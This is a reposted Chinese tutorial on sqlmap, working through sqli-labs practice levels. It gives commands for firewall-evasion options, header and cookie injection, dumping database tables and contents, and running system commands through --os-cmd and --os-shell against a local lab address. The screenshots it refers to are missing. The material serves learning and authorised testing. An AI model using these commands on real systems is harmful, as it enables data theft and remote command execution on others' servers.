sqlmap使用手册



详解：

--delay

有些web服务器请求访问太过频繁可能会被防火墙拦截，使用--delay就可以设定两次http请求的延时

 

--safe-url

有的web服务器会在多次错误的访问请求后屏蔽所有请求，使用--safe-url 就可以每隔一段时间去访问一个正常的页面。

 

--tamper

语法：--tamper ["脚本名称"]

当调用多个脚本的时候，脚本之间用逗号隔开，调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

脚本信息

 

-v ["x"]

使用sqlmap注入测试时，可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:

 

--level

level有5个等级，默认等级为1，进行Cookie测试时使用--level 2 ，进行use-agent或refer测试时使用--level 3 ，进行 host 测试时使用--level 5

 

–-os-cmd=["命令"] 或 --os-shell=["命令"] 执行系统命令

利用sql-labs-less1测试 whoami 命令

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami

选择web服务器支持的语言

 

 选择web服务器的可写目录

[1] 使用默认的

[2] 自定义位置

[3] 自定义目录列表文件

[4] 暴力搜索

我在本地测试，节省时间，我选择2 ，自定义路径，然后把路径输入在下面

执行命令后的返回结果

以下关卡均可用get型的方法，常规注入

 

 

 

sql注入检测

get型：

语法：sqlmap -u ["url"]

 

 post型：

先使用bp把提交的数据包保存下来

或者直接

加上post提交的参数

语法：sqlmap -r ["请求包的txt文件"]

 

sql-labs -less1~sql-labs-less9

获取当前数据库名称：

语法：sqlmap -u [“url”] --current-db

获取指定数据库的表名：

语法：sqlmap -u [“url”] -D [‘数据库名’] --tables

 

获取指定数据库指定表中的字段：

语法：sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns

获取指定数据库指定表的指定字段的字段内容：

语法：sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump

 

 sql-labs-less10

 

提升等级 -level 2

 

 

 sql-labs-less11~less17常规 POST 注入

 

 

 

 

 

sql-labs-less18

Header injection - Uagent

sqlmap 在对user-agent 注入的时候，得在文件中的user-agent的参数后面加上 *

 

 

 

或者不加 * 号，调用 --level参数，将等级调至 3级，只有等级为 3级即以上时才能对 user-agent进行注入

 

 

 

sql-labs-less19

Header injection - Referer

对Referer注入和User-agent相同，要么是在Referer后面加上 *

 

 

或者将 level 调至 3 级

 

 

sql-labs-less20

Header injection -Cookie

语法：sqlmap -u [“url”] --cookie ["cookie信息"] --level 2

 

 

 

 

原文：https://www.cnblogs.com/Hunter-01001100/p/12377393.html

版权声明：

本文来源网络，所有图片文章版权属于原作者，如有侵权，联系删除。

本文网址：https://www.mushiming.com/mjsbk/12079.html